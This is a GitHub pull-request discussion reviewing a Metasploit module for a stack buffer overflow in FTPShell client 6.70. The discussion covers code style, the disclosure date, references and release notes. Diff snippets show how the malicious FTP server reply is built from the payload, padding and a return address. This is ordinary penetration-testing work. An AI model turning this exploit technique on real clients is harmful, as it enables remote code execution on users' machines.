New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow #10213
FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow #10213
Conversation
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
LGTM. Minor comments.
|
||
sploit = "220 \"" | ||
sploit << payload.encoded | ||
sploit << "\x20"*(400-payload.encoded.length) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I believe you can use payload_space
from Msf::Module::Target
here, rather than hardcoding 400
.
Also, some white space between operators makes this a little easier to read.
sploit << "\x20" * (payload_space - payload.encoded.length)
|
||
register_options( | ||
[ | ||
OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ]) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Single quotes are preferred when string interpolation isn't required.
Also, my personal preference is to format register_options
as follows when there's only one option with a short description.
register_options [ OptPort.new('SRVPORT', [ true, 'The FTP port to listen on', 21 ]) ]
or:
register_options [
OptPort.new('SRVPORT', [ true, 'The FTP port to listen on', 21 ])
]
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Fixed the register_options.
'Author' => | ||
[ | ||
'r4wd3r', # Original exploit author | ||
'Daniel Teixeira <danieljcrteixeira[at]gmail.com>' # MSF module author |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
It looks like you're mentioned in about a dozen modules, and usually without an associated email address.
If you like, we can add your name to the .mailmap
file. That way your email will be auto-populated in the documentation and when viewing the module info within msfconsole
. Up to you.
# grep -rni 'Daniel Teixeira' modules/
modules/exploits/multi/http/oscommerce_installer_unauth_code_exec.rb:22: 'Daniel Teixeira' # MSF module author
modules/exploits/windows/browser/exodus.rb:27: 'Daniel Teixeira' # MSF module author
modules/exploits/windows/ftp/ayukov_nftp.rb:23: 'Daniel Teixeira', # MSF module author
modules/exploits/windows/ftp/labf_nfsaxe.rb:23: 'Daniel Teixeira' # MSF module author
modules/exploits/windows/http/dupscts_bof.rb:27: 'Daniel Teixeira' # Metasploit module
modules/exploits/windows/http/vxsrchs_bof.rb:26: 'Daniel Teixeira'
modules/exploits/windows/http/syncbreeze_bof.rb:26: 'Daniel Teixeira',
modules/exploits/windows/http/disksorter_bof.rb:26: 'Daniel Teixeira'
modules/exploits/windows/fileformat/syncbreeze_xml.rb:22: 'Daniel Teixeira'
modules/exploits/windows/fileformat/dupscout_xml.rb:22: 'Daniel Teixeira'
modules/exploits/windows/misc/cloudme_sync.rb:24: 'Daniel Teixeira' # MSF module author
modules/exploits/windows/misc/disk_savvy_adm.rb:24: 'Daniel Teixeira'
modules/auxiliary/dos/http/slowloris.py:24: 'Daniel Teixeira', # Metasploit module (Ruby)
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thank you, I would appreciate that if you could.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thank you
super(update_info(info, | ||
'Name' => 'FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow', | ||
'Description' => %q{ | ||
This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise edition) allowing remote |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Line wrap at ~80 columns is preferred, but not required. In this instance it would make sense, as the following line contains only two words.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Done, thanks.
res = client.get_once.to_s.strip | ||
print_status("#{client.peerhost} - Request: #{res}") | ||
|
||
sploit = "220 \"" |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
No need to use double quotes and escaping here.
sploit = '220 "'
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Done.
'SRVHOST' => '0.0.0.0', | ||
'EXITFUNC' => 'thread' | ||
}, | ||
'DisclosureDate' => 'May 15 2017', |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Is this 2017 disclosure date accurate? The CVE listed in References
is from 2018.
A quick grep reveals this might be a result of forgotten copypasta from another FTP module:
# grep -rn "'May 15 2017'" modules/exploits/
modules/exploits/windows/ftp/labf_nfsaxe.rb:45: 'DisclosureDate' => 'May 15 2017',
[...]
However, it appears there was a previous similar bug reported in FTPShell with CVE (2017-6465) dated March 9th 2017, with an exploit published on EDB on March 4th 2017.
If these are applicable, please add refs:
- BID: 96570
- EDB: 41511
- CVE: 2017-6465
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I'm sorry, I've fixed the disclosure date to March 4 2017
sploit << payload.encoded | ||
sploit << '\x20' * (payload_space - payload.encoded.length) | ||
sploit << target.ret | ||
sploit << '" is current directory\r\n' |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
It looks like you were a little overzealous in replacing "
with '
.
Double quotes are needed for escaping, such as hex and CRLF.
sploit = '220 "'
sploit << payload.encoded
sploit << "\x20" * (payload_space - payload.encoded.length)
sploit << target.ret
sploit << "\" is current directory\r\n"
end | ||
|
||
def on_client_connect(client) | ||
return if ((p = regenerate_payload(client)) == nil) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
.nil?
is preffered
I think the If you fix the issues outlined above (double quotes, mixin,
I ran into a couple of issues. Seems the exploit is not 100% reliable, which is ok for |
All done, hopefully this will address all the issues. Thank you for all the help. |
LGTM
|
Release NotesThe exploit/windows/ftp/ftpshell_cli_bof module has been added to the framework. It exploits a stack-based buffer overflow vulnerability in FTPShell client 6.70 (Enterprise edition) on Windows systems. |
Nice job @DanielRTeixeira. Thanks for the credit on this one ;) |
Hello, the success rate of this vulnerability is not 100%, is there any solution? |
This PR adds a module to exploit a remote buffer overflow in the FTPShell client 6.70.
Tested on: Windows 7 Enterprise SP1 x64
Verification
List the steps needed to make sure this thing works
msfconsole
use exploit/windows/ftp/labf_nfsaxe
Example